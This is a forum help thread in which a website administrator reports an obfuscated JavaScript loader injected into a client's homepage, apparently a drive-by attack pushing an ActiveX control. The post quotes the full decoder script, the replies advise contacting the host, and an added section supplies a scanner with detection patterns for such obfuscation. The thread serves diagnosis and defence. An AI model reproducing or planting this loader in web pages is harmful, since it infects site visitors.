Solved

remote data services data control bloodhound virus embedded in webpage

Posted on 2007-10-07
Last Modified: 2013-12-09
I have a client who had some clients calling saying there is a virus in his website.
The screenshots they emailed were scan results from Norton AntiVirus saying it was a Bloodhound trojan.

I went to the website and was prompted to install the "remote data services data control" ActiveX object.

I declined ;)

I downloaded the actual index page and found this suspicious JavaScript in it:

<SCRIPT LANGUAGE="JavaScript">
<!--
function N9203f348(Ac85Fc8){var Hb59a2A=arguments.callee.toString().replace(/\W/g,"").toUpperCase();var o21A8D0a391EB9772;o21A8D0a391EB9772+=714;o21A8D0a391EB9772=o21A8D0a391EB9772.toString();var fuwck_Allav=1;var i=o21A8D0a391EB9772.charCodeAt(224);var h33faE2;var G1447bb2B81EB9772;G1447bb2B81EB9772+=185;G1447bb2B81EB9772=G1447bb2B81EB9772.toString();var stSllaSllop_av=1;var I26565c=Hb59a2A.length;var me7740035fbEB9772;me7740035fbEB9772++;var cxuj_csa_v_fzfhaopu=1193;var etero_vreme0noata=300;var E6a08E;var d6a874AEE12EB9772;d6a874AEE12EB9772++;d6a874AEE12EB9772=d6a874AEE12EB9772.toString();var stSllaSllop_av=1;var TDCc45;var CB9cfe29494EB9772;CB9cfe29494EB9772-=403;var cxuj_csa_v_fzfhaopu=1193;var etero_vreme0noata=300;var n7F49b8f8='';var iC49Cd=new Array(0,1400113684+(596846210),3308810245+(685109543),1081686462+(1485838332),93390784+(31243353),5414358+(1880643257),2088893729+(1826727956),1358664212+(1298727823),139801186+(109467088),588180366+(1456327958),3095672491+(676442739),649397390+(1897780474),49274316+(113667679),1343463824+(782097197),2755366762+(1132240285),682685923+(1745758126),335599512+(162937036),68856260+(1721071406),2474466460+(1614550188),789175331+(1437885883),263698001+(186850860),1727714474+(115544129),3525802212+(581778541),801317111+(1410360528),22344584+(303539406),1625402458+(59374694),2387520284+(1863601758),949011337+(1372915299),205539807+(130093680),1390845472+(270519993),2056866876+(2138435879),305939319+(2060175998),615825076+(381248020),605892112+(676061774),2181324650+(1398530682),1564392047+(1160296195),597666762+(409221383),180832697+(1077774990),3212561258+(311540371),2652859702+(116082741),514478422+(386619300),131017574+(987983110),1672653991+(2013863215),2071894759+(826170969),789053046+(63991405),173646249+(998619852),3280570311+(424445448),949599321+(1933017344),79560369+(572207611),708011456+(665492090),2146134725+(1223419579),1557948405+(1660156193),411714292+(153792961),1104045341+(350576390),2562078632+(923033073),14
63645875+(1635790428),149228107+(522038867),955046840+(639151184),2461508851+(861222079),2116264504+(854083308),372282533+(423552994),631055915+(852174310),2477591617+(766775658),2255348551+(804801014),465910108+(1528236084),13335841+(17822693),598810563+(1965097209),2086260462+(1937457468),811861782+(1095597683),96120498+(16516717),626613044+(2053540209),2422210075+(1482216984),896639248+(1117137042),93856511+(157865525),2356311069+(160904305),3036096338+(739733702),1366600782+(771055981),121534312+(19842501),1914010321+(525267398),2522007705+(1343263592),1325333703+(476861741),158772487+(318092379),1382065230+(855936138),3886816065+(179692813),405969475+(1406401450),33401713+(419691018),366141783+(1815483242),2987960606+(1123490617),1435452155+(270636747),98863735+(215178969),366958276+(1977573926),3545827791+(694189741),277262287+(1381395984),136374018+(230245959),863679568+(1498990755),3462845985+(762148420),688847331+(614688629),653318655+(331642831),2194884852+(552122240),1858751225+(1710286313),1066583385+(189587432),579425509+(458178802),1720191084+(1045019649),3138668351+(415411644),900399575+(230614931),553436038+(326243958),1754098116+(1155145346),2662100944+(1001670912),490975226+(650149241),31271810+(824570467),2655350774+(197450857),3587996848+(120651801),60917875+(1281616073),255531617+(398927689),2888051433+(300344615),2832481298+(540533876),781607351+(684872558),60890683+(483288952),1446499420+(1664024493),2507012709+(955509306),1094105172+(497565882),612301557+(89837219),1316761403+(1649699047),1473837546+(1878961866),918856906+(586061901),565897591+(217654282),2589013804+(493626639),2675257300+(558185689),3817965560+(170326824),1550505767+(1045748879),3645782+(58671286),341725769+(1616085073),2435918264+(1503927681),1481808108+(1166008003),5278208+(76192789),209260911+(1734542612),3590470620+(224448310),1450438389+(1039158415),87093413+(138181017),38068358+(2015722018),3254088244+(572087511),1680725279+(786180734),45243840+(122572903),243947792+(1
853703585),2187984851+(1839567729),1976255600+(289234786),256690259+(246753813),1385094175+(376956639),3892838250+(257578995),243351049+(1910778306),373622955+(52899270),1097363001+(755144878),3017904096+(1257409430),1477636575+(834681345),78884156+(203869470),541649362+(1200906490),2353820643+(1835887500),1414628210+(980249735),230496636+(167421127),1238152950+(384030687),1578392273+(2025998615),834786024+(1880080534),432643715+(521086017),1297710604+(42366022),2620115096+(898604889),1438532180+(1358828819),99326768+(969501613),96585660+(1123053199),3374238264+(250503586),1378443658+(1558231490),821079355+(85106107),268221414+(822591098),3550743427+(196928576),1845197928+(980181741),300518100+(528811035),326174017+(855161144),2142761277+(1269416527),2385269994+(775564848),362116112+(265969296),1238215209+(144390157),2884509603+(538859506),1539643225+(1598435242),435905480+(134656753),1056532694+(369868121),3031683603+(285632939),2377453759+(621279849),616788130+(116451824),989003473+(566258483),1667406006+(1601529585),2589060315+(461300310),277127094+(475332309),61275669+(1480044552),2413174724+(193897196),2658389814+(1307583216),1254919420+(715003552),7356361+(33379137),2098908838+(518928387),2259071986+(1684505165),1845016240+(68071637),69651736+(14256635),1417088627+(1095253007),2744377486+(1059363206),483185550+(1592023072),200646201+(12614911),423727656+(2039544947),1735156178+(2120834107),913659831+(1181194240),32275459+(166683422),1513113705+(748915307),2610097073+(1447163537),1218370290+(540989702),315467757+(218946433),1278603410+(898115131),3463682660+(675646455),937275899+(936560102),60245631+(354418936),985322630+(1296926304),2492948488+(1786251880),553899693+(1157784861),104871107+(180410009),2305733185+(100068542),3176664417+(990552328),1550934650+(83533145),82263963+(293965738),2534416000+(150651896),2809470708+(798536698),1231369400+(77549212),286963654+(669580284),2472996890+(335558215),2041418802+(1454539461),1024260344+(207375957),664042847+(3833
84188),2566540799+(366419019),2771152154+(883551682),512850112+(575509158),678437681+(258480319),1990812758+(856902141),1980134430+(1756703399),985843580+(217057283),28650346+(788583551),2126958820+(1056383288),1440289282+(1960947848),658168939+(746108613),508774181+(107043969),2645096838+(489110655),1770752488+(1682668715),433094608+(990762841),18314334+(583136097),1688400666+(1321436948),3293646402+(1064054),1177578193+(389525553),2351958+(709576766),2029052089+(991616382),2799321367+(473058698),1305197241+(205136994),368065956+(387101161));E6a08E=4294967295;for(h33faE2=0;h33faE2<I26565c;h33faE2++){E6a08E=iC49Cd[(E6a08E^Hb59a2A.charCodeAt(h33faE2))&255]^((E6a08E>>8)&16777215);}E6a08E=E6a08E^4294967295;var G50271DD;var l571d8;h33faE2=E6a08E&65535;G50271DD=h33faE2.toString(16).toUpperCase();while(G50271DD.length<4){G50271DD="0"+G50271DD;}h33faE2=(E6a08E>>>16)&65535;l571d8=h33faE2.toString(16).toUpperCase();while(l571d8.length<4){l571d8="0"+l571d8;}TDCc45=l571d8+G50271DD;var P94783f;var t793BCD0=0;var P18945766;var t3B037e;var i0eFA2450;var Efefb48='';for(P94783f=0;P94783f<Ac85Fc8.length;P94783f+=2){i0eFA2450=0;n7F49b8f8="";t3B037e="";t3B037e+=Ac85Fc8.charAt(P94783f);t3B037e+=Ac85Fc8.charAt(P94783f+1);P18945766=parseInt(t3B037e,16);i0eFA2450=P18945766-TDCc45.charCodeAt(t793BCD0);if(t793BCD0<TDCc45.length-1){t793BCD0++;}else{t793BCD0=0;}P94783f+=2;while(i0eFA2450!=0){t3B037e="";t3B037e+=Ac85Fc8.charAt(P94783f);t3B037e+=Ac85Fc8.charAt(P94783f+1);P18945766=parseInt(t3B037e,16);n7F49b8f8+=String.fromCharCode(P18945766-TDCc45.charCodeAt(t793BCD0));if(t793BCD0<TDCc45.length-1){t793BCD0++;}else{t793BCD0=0;}i0eFA2450--;P94783f+=2;}var rEE11EB3=parseInt(n7F49b8f8);if(rEE11EB3!=0){if(rEE11EB3>127){n7F49b8f8="&#"+rEE11EB3.toString()+";";}else{n7F49b8f8=String.fromCharCode(rEE11EB3);}Efefb48+=n7F49b8f8;}P94783f-=2;}document.write(Efefb48);var Ie8895df220EB9772;Ie8895df220EB9772--;var cxuj_csa_v_fzfhaopu=1193;var etero_vreme0noata=300;var 
nF9eed8ce76EB9772;nF9eed8ce76EB9772++;nF9eed8ce76EB9772=nF9eed8ce76EB9772.toString();var stSllaSllop_av=1;}
N9203f348('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');
//-->
</SCRIPT>


The client did not put this in his webpage. I removed it and am no longer prompted to install the ActiveX object.

I was not able to find much on Google regarding this, but it seems it could be from an unpatched server being compromised.

I am hesitant to go to the hosting company until I have some facts.

Any advice would be great.

Thanks.
Question by:livegirllove
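
A triage check for the situation described in the question, as an added example that is not part of the original post or its replies: it scans a page's inline script blocks for the combination of traits visible in the script quoted above (reading its own source with `arguments.callee.toString()`, decoding hex pairs, building text with `String.fromCharCode`, and emitting it through `document.write`). The trait names, the `long-hex` pattern, the thresholds and the sample page are constructed assumptions.

```javascript
// Added example (not from the thread): flag inline <script> blocks that
// combine the traits of the decoder quoted above. Pattern names, the
// 64-character hex threshold and minTraits=3 are assumptions to tune.
const TRAITS = [
  ["self-read", /arguments\.callee\.toString\s*\(/],     // reads its own source
  ["hex-decode", /parseInt\s*\([^;]{1,80}?,\s*16\s*\)/], // hex pairs -> numbers
  ["char-build", /String\.fromCharCode\s*\(/],           // numbers -> text
  ["doc-write", /document\.write\s*\(/],                 // injects decoded markup
  ["long-hex", /(['"])[0-9A-Fa-f]{64,}\1/],              // encoded payload literal
];

// Return every inline script body with the 1-based line where its tag starts.
function extractInlineScripts(html) {
  const out = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  for (const m of html.matchAll(re)) {
    if (/\bsrc\s*=/i.test(m[1]) || m[2].trim() === "") continue; // external/empty
    const line = html.slice(0, m.index).split("\n").length;
    out.push({ line, body: m[2] });
  }
  return out;
}

// Report scripts matching at least minTraits of the patterns above.
function scanPage(html, minTraits = 3) {
  return extractInlineScripts(html)
    .map(({ line, body }) => ({
      line,
      traits: TRAITS.filter(([, re]) => re.test(body)).map(([name]) => name),
    }))
    .filter((hit) => hit.traits.length >= minTraits);
}

// Constructed sample page: one ordinary script and one inert stand-in that
// only shares the decoder's shape (it would write a run of the letter "A").
const SAMPLE_PAGE = [
  "<html><body>",
  "<script>document.write(new Date().getFullYear());</script>",
  "<p>Welcome</p>",
  '<SCRIPT LANGUAGE="JavaScript">',
  "function d(s){var k=arguments.callee.toString();var o='';",
  "for(var i=0;i<s.length;i+=2){var h=s.charAt(i)+s.charAt(i+1);",
  "o+=String.fromCharCode(parseInt(h,16));}document.write(o);}",
  "d('" + "41".repeat(40) + "');",
  "</SCRIPT>",
  "</body></html>",
].join("\n");

for (const hit of scanPage(SAMPLE_PAGE)) {
  console.log(`line ${hit.line}: ${hit.traits.join(", ")}`);
}
```

Running the same function over every HTML file in the site's document root, and comparing hits against a known-good copy of the site, gives the concrete list of modified pages to hand to the hosting company.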
3 Comments
 
LVL 16

Expert Comment

by:Kiran Paul VJ
ID: 20032620
Inform the server people that they have a virus in their server.
 
LVL 16

Accepted Solution

by:
Kiran Paul VJ earned 2000 total points
ID: 20032629
 
LVL 1

Author Comment

by:livegirllove
ID: 20032649
Yes, these are my same symptoms. I read those but wanted some backup.

I will contact the hosting company.